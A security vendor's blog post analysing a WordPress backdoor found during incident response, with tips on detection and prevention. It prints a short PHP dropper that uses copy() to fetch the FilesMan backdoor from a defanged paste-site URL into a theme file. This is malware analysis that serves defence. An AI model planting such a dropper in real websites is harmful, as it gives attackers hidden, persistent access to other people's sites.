• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Backdoor using a paste site to host payload

Backdoor Uses Paste Site to Host Payload

September 18, 2018Bruno ZanelatoEspanolPortugues

31
SHARES
FacebookTwitterSubscribe

Finding backdoors is one of the biggest challenges of a website security analyst, as backdoors are designed to be hidden in case the malware is found and removed.

Website Backdoors

A backdoor is a piece of malware that attackers leave behind to allow them access back into a website. Hackers like to inject code into different locations to increase their chances of retaining control of the website so they can reinfect it continuously.

Over the year, we have been talking a lot about new ways to decode complex malware that involve usual PHP functions like:

  • eval,
  • create_function,
  • preg_replace,
  • assert,
  • base64_decode.

According to our latest website hacked report, over the course of the previous year:

71% of all compromises had a PHP-based backdoor hidden within the site.

The effectiveness of these backdoors comes from their elusiveness to most website scanning technologies.

We have written many posts on backdoors and their effects. Today, we want to discuss some techniques that don’t follow any obfuscation tricks like encrypted strings, concatenations, and typecasting.

Unusual Backdoors

These unusual backdoors often look like legitimate code and can go unnoticed by most malware scanners available in the market.

However, during an incident response investigation, we detected an interesting backdoor that was small, simple and effective.

The backdoor content uploaded the wp-content/themes/buildup/db.php file and looked like this:

<?php
if ( @copy('hxxps://paste[.]ee/r/3TwsC/0', 'db.php') ) {
echo "Copy_success";
}else{
echo "Copy_failed";
}
?>

This small piece of code downloads the full malware from the hxxps://paste[.].ee website (if you are not familiar with this site, it’s like a Pastebin with SSL and fewer controls).

A free tool obfuscated the downloaded code, which is pretty common for malware developers to find. Additionally, we also see legitimate code using it too.

Obfuscated code that downloads malware from a website
Obfuscated code that downloads malware from a website

Note to devs: Avoid using free tools because they may be saving your code.

And here’s the more “readable” code:

Code that downloads malware from a website
Code that downloads malware from a website

And, as you may have noticed, this is a copy of the FilesMan backdoor which is often hidden in the filesystem making it hard to be found without access to the server or logs. A file is downloading the backdoor. An untrained eye may overlook this.

How to Avoid Website Backdoors

Backdoors can be very hard to find and even harder to get rid of. To begin, it is highly advisable that you monitor your logs constantly for unexpected behavior.

In order to prevent the website from getting infected in the first place, we highly recommend implementing security measures like file integrity monitoring and a Website Application Firewall (WAF).

If you suspect that your website is infected with a backdoor, we have an experienced website security team that can clean up your website. If you are a looking for a DIY solution, we have written a guide explaining How to Clean a Hacked Website.

31
SHARES
FacebookTwitterSubscribe

Categories: Website Malware Infections, Website Security, WordPress SecurityTags: Black Hat Tactics, Website Backdoor, WordPress Plugins and Themes

About Bruno Zanelato

Bruno is the Website Firewall Manager at Sucuri. He has 15 years experience deploying open-source security software, hardening systems, PCI compliance, and preventive measures for new exploitation techniques. He is currently a member of the Brazilian Snort community and OWASP Brazilian chapter member. Find him on Twitter @braindeadlylabs

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

WordPress Security Course

The Anatomy of Website Malware Webinar

WordPress Security Guide

How to know you can trust a plugin

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2019 Sucuri Inc. All rights reserved

We use tools, such as cookies, to enable essential services and functionality on our site and to collect data on how visitors interact with our site, products and services. By clicking Continue, you agree to our use of these tools for advertising, analytics and support.Continue Read More
Privacy & Cookies Policy

Necessary Always Enabled